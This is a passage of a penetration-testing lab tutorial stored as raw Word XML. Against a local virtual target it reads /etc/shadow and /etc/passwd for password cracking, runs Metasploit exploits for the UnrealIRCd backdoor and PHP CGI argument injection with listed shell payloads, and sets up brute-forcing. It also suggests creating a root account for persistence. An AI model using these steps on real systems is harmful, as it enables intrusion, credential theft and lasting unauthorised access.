    <w:p w14:paraId="6082FE08" w14:textId="12F31F1B" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD1698" w14:textId="2FBF4ADB" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A78F32" w14:textId="0E56F46A" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:r>
        <w:t xml:space="preserve">With the above, you can </w:t>
      </w:r>
      <w:r w:rsidR="009161A6">
        <w:t xml:space="preserve">highlight the resulting text and save them to </w:t>
      </w:r>
      <w:r w:rsidR="0020681E">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="009161A6">
        <w:t>otepad, and crack them with a password cracking utility called John the Ripper, as seen in the supporting video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B519E" w14:textId="7A55611E" w:rsidR="00B048ED" w:rsidRDefault="00B048ED" w:rsidP="00DD35D6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D46C39D" w14:textId="77777777" w:rsidR="00B048ED" w:rsidRDefault="00B048ED" w:rsidP="00B048ED">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Unreal ICQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB0DC4" w14:textId="77777777" w:rsidR="00F07B4C" w:rsidRDefault="00F07B4C">
      <w:r>
        <w:t>Lets look at one of the vulnerabilities that</w:t>
      </w:r>
      <w:r w:rsidR="00963603">
        <w:t xml:space="preserve"> might or might not give us anything</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, but explain how the Metasploit framework is used.  Lets attack port 6697, IRC and the </w:t>
      </w:r>
      <w:r w:rsidR="00790561">
        <w:t>UnrealIRCD 3.2.8.1 Backdoor Command Execution</w:t>
      </w:r>
      <w:r>
        <w:t>.  For this, we must use an exploit, and the syntax is first like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBE6BB" w14:textId="77777777" w:rsidR="00790561" w:rsidRPr="00F07B4C" w:rsidRDefault="00790561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07B4C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>use exploit/unix</w:t>
      </w:r>
      <w:r w:rsidR="00F07B4C" w:rsidRPr="00F07B4C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/irc/unreal_ircd_3281_backdo</w:t>
      </w:r>
      <w:r w:rsidR="00F07B4C" w:rsidRPr="00F07B4C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F5533" w14:textId="14925726" w:rsidR="00F07B4C" w:rsidRDefault="00F07B4C" w:rsidP="00F07B4C">
      <w:r>
        <w:t>We need to configure this exploit before we use it.  This is done by the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E44106" w14:textId="77777777" w:rsidR="00790561" w:rsidRPr="00963603" w:rsidRDefault="00F07B4C" w:rsidP="00F07B4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963603">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00790561" w:rsidRPr="00963603">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>how options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F3F33" w14:textId="77777777" w:rsidR="00790561" w:rsidRDefault="00F07B4C" w:rsidP="00F07B4C">
      <w:r>
        <w:t>RHOST is one of the settable options, and it currently doesn’t have anything set.  RPORT is another, but is set to the default of 6667, and matches the port from our nmap port scan, so is OK, and we don’t need to worry about it.  We will need to set RHOST option, however.  Type in the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26484DF6" w14:textId="77777777" w:rsidR="00F07B4C" w:rsidRPr="00963603" w:rsidRDefault="00F07B4C" w:rsidP="00F07B4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963603">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Set RHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3A651" w14:textId="77777777" w:rsidR="00790561" w:rsidRDefault="00963603" w:rsidP="00F07B4C">
      <w:r>
        <w:t>Now we tell Metasploit to attack by the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7043FF" w14:textId="77777777" w:rsidR="00963603" w:rsidRPr="00963603" w:rsidRDefault="00963603" w:rsidP="00F07B4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963603">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED6DEB" w14:textId="2D825A85" w:rsidR="00963603" w:rsidRPr="007D3313" w:rsidRDefault="00963603">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you have a result similar to “command shell session 1 opened …”, you have logged in.  </w:t>
      </w:r>
      <w:r w:rsidR="007D3313">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BUT THIS DOESN’T WORK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2570D4D5" w14:textId="55775E13" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:t>When we test this we get an indication that there is no payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E489DEB" w14:textId="5DA7A872" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001FB707" wp14:editId="74DDB324">
            <wp:extent cx="5943600" cy="35201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7444"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3520176"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5F5E9" w14:textId="35FCF037" w:rsidR="00B3618E" w:rsidRDefault="00B3618E">
      <w:r>
        <w:t>Continued in next image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64AE02" w14:textId="2A7473B8" w:rsidR="00B3618E" w:rsidRDefault="00B3618E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50883063" wp14:editId="39A72E4A">
            <wp:extent cx="5943600" cy="332579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0346"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3325799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5085AA6F" w14:textId="3CB73C96" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:t>Simply put, our payload isn’t defined.  We can manage this with the set payload command, as seen here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8929B4" w14:textId="23BB716B" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597C7819" wp14:editId="59B104DA">
            <wp:extent cx="5943600" cy="3816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16985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FACA65" w14:textId="1816727C" w:rsidR="00B3618E" w:rsidRDefault="00B3618E">
      <w:r>
        <w:t>The above lists out the payloads available, as seen below.  I still truncate the text, but you get the idea of what payloads are available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3032C58E" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRDefault="00B3618E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23914BD2" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRDefault="00B3618E"/>
    <w:p w14:paraId="77B14787"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Compatible Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67120C63"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A722608" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRPr="00B3618E" w:rsidRDefault="00B3618E" w:rsidP="00B3618E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4829C23E"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   Name                                Disclosure Date  Rank    Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050DAD5A"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   ----                                ---------------  ----    -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C00D97"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0   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD64706"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1   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096FA40C"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2   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5255F"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3   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A76C27"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4   cmd/unix/generic                                     normal  No     Unix Command, Generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECE850"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5   cmd/unix/reverse                                     normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39991E3A"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6   cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422976C1"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7   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBDA23B"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8   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45057C49"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9   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DE7F7" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRPr="00B3618E" w:rsidRDefault="00B3618E" w:rsidP="00B3618E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3618E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   10  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F38DAB4" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRPr="00B3618E" w:rsidRDefault="00B3618E" w:rsidP="00B3618E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3618E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   11  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032AFB7E" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRDefault="00B3618E" w:rsidP="00B3618E"/>
    <w:p w14:paraId="22FECAEB" w14:textId="77777777" w:rsidR="00B3618E" w:rsidRDefault="00B3618E" w:rsidP="00B3618E">
      <w:r>
        <w:t>With the above, I was able to list available payloads to try.  I chose the first one (bind_perl) probably because PERL is an old favourite of mine, but it works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7ECBA" w14:textId="25D35BA5" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:t>Now when we verify our settings again (with the show options again) we see we are good to go:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F9D63" w14:textId="246FE82D" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123FDE6E" wp14:editId="03887151">
            <wp:extent cx="5943600" cy="4036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6695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="742ABF37" w14:textId="2D879B1C" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:t>When we hit exploit, we see we have successfully created a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46564103" w14:textId="0156FD2C" w:rsidR="007D3313" w:rsidRDefault="007D3313">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013B34B0" wp14:editId="7D2F98FE">
            <wp:extent cx="5943600" cy="1325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5880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF5EE2" w14:textId="39EED3B7" w:rsidR="007D3313" w:rsidRPr="00963603" w:rsidRDefault="007D3313" w:rsidP="007D3313">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>To determine the degree of the vulnerability, type in whoami, as seen in the above image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E7CC68" w14:textId="77777777" w:rsidR="007D3313" w:rsidRDefault="007D3313" w:rsidP="007D3313">
      <w:r>
        <w:t>It will show you who you are logged in as.  At this time, you could create a new user with root privileges, log out, and log in as usual and exploit away!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599967C" w14:textId="77777777" w:rsidR="007D3313" w:rsidRPr="00924712" w:rsidRDefault="007D3313" w:rsidP="007D3313">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924712">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>You can type exit and quit, and logout to see which one works.  Exit might need to be typed twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502EF1AE" w14:textId="323CF8CC" w:rsidR="007D3313" w:rsidRDefault="007D3313" w:rsidP="007D3313">
      <w:r>
        <w:t xml:space="preserve">Exit should, but you may need to hit (left) Ctrl + C, keeping in mind the right Ctrl </w:t>
      </w:r>
      <w:r w:rsidR="004912F2">
        <w:t>might be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mapped to VirtualBox, so use the left Ctrl key</w:t>
      </w:r>
      <w:r w:rsidR="004912F2">
        <w:t>.  It depends on your environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FA89DC" w14:textId="77777777" w:rsidR="007D3313" w:rsidRDefault="007D3313" w:rsidP="007D3313">
      <w:r>
        <w:t xml:space="preserve">At this time, you have compromised a system, created an account you can use to log into whenever you wish.  Normally you would be done, as the more you probe, the more likely you are to be discovered, and as such, unnecessary probing would be avoided </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>UNLESS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> you are doing a security audit to discover and block all vulnerabilities.  This better reflects our activities, so we continue on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333ED120" w14:textId="68216932" w:rsidR="004413EB" w:rsidRDefault="00790561" w:rsidP="004413EB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>PHP CGI Argument Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CDA11E" w14:textId="7AF2A543" w:rsidR="004912F2" w:rsidRDefault="004912F2" w:rsidP="004912F2">
      <w:r>
        <w:t>Another item we noticed in our scan was that Apache was running.  Any time we see a website running, we should do some further analysis using web enumeration tools such as dirb or nikto.  When we run these command like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAF0FA" w14:textId="59D93FB9" w:rsidR="004912F2" w:rsidRPr="004912F2" w:rsidRDefault="004912F2" w:rsidP="004912F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004912F2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>dirb http://192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E8E59" w14:textId="7E5BEFBF" w:rsidR="004912F2" w:rsidRPr="004912F2" w:rsidRDefault="004912F2" w:rsidP="004912F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004912F2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nikto -h 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280968DA" w14:textId="6A227201" w:rsidR="004912F2" w:rsidRPr="004912F2" w:rsidRDefault="004912F2" w:rsidP="004912F2">
      <w:r>
        <w:t>We get an indication that both CGI is running as well as an older version of PHP.  There is a known vulnerability around improper argument becoming injected into the CGI environment.  Let’s see if we can take advantage of this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE9867B" w14:textId="77777777" w:rsidR="004413EB" w:rsidRPr="000A0CD2" w:rsidRDefault="00790561" w:rsidP="000A0CD2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0CD2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>use exploit/mu</w:t>
      </w:r>
      <w:r w:rsidR="000A0CD2" w:rsidRPr="000A0CD2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>lti/http/php_cgi_arg_injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8C599" w14:textId="307002A1" w:rsidR="004413EB" w:rsidRPr="000A0CD2" w:rsidRDefault="004912F2" w:rsidP="000A0CD2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00790561" w:rsidRPr="000A0CD2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>how options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2138CD" w14:textId="2B698FAF" w:rsidR="00790561" w:rsidRDefault="004912F2" w:rsidP="004413EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00790561" w:rsidRPr="000A0CD2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9E70F" w14:textId="3219CADC" w:rsidR="00686000" w:rsidRPr="000A0CD2" w:rsidRDefault="00686000" w:rsidP="004413EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="228832DE" wp14:editId="65341BB7">
            <wp:extent cx="5943600" cy="1193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93800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CEF7B" w14:textId="6D8C849C" w:rsidR="00790561" w:rsidRDefault="000A0CD2" w:rsidP="004413EB">
      <w:r>
        <w:t>May or may not work</w:t>
      </w:r>
      <w:r w:rsidR="00790561">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and even if it does, </w:t>
      </w:r>
      <w:r w:rsidR="00790561">
        <w:t>limited</w:t>
      </w:r>
      <w:r w:rsidR="004413EB">
        <w:t xml:space="preserve"> in what you can do.</w:t>
      </w:r>
      <w:r w:rsidR="00686000">
        <w:t xml:space="preserve">  One of the issues here is the confusion the Metasploit Framework module has around our local host.  When we address this, our attack works</w:t>
      </w:r>
      <w:r w:rsidR="009C6915">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C84D9B" w14:textId="25C02124" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="004413EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5083844F" wp14:editId="74596D39">
            <wp:extent cx="5943600" cy="3217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7545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C41840" w14:textId="73961A08" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="004413EB">
      <w:r>
        <w:t>With this, we get limited functionality, but enough for us to try a different attack.  Now we have access, we can try looking at /etc/passwd and /etc/shadow as we did with the vsftp and unrealircd exploits above.  Because we don’t get root access (we seem to be the user id that the web server runs as) we can only see the /etc/passwd command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60719FDD" w14:textId="3EBF45EA" w:rsidR="009C6915" w:rsidRPr="009C6915" w:rsidRDefault="009C6915" w:rsidP="004413EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6915">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9EA2A" w14:textId="453DD313" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="004413EB">
      <w:r>
        <w:t>With this, we can get a list of users to attack.  Create a text file of users (users2.txt) and add the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339538C5" w14:textId="66548E03" w:rsidR="00337E4E" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79040879" wp14:editId="596A83F1">
            <wp:extent cx="5943600" cy="3554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4730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAF25F" w14:textId="77777777" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t xml:space="preserve">With the above, we can begin a network attack using the Medusa tool.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513779E0" w14:textId="7FFE0256" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Before we use it, however, we have to make a password file or password dictionary available for our use.  There is a file called rockyou.txt that contains 14.3 million real world passwords, but it is encrypted.  We need to unzip it before we use it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E3BD6" w14:textId="1D923683" w:rsidR="009C6915" w:rsidRPr="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
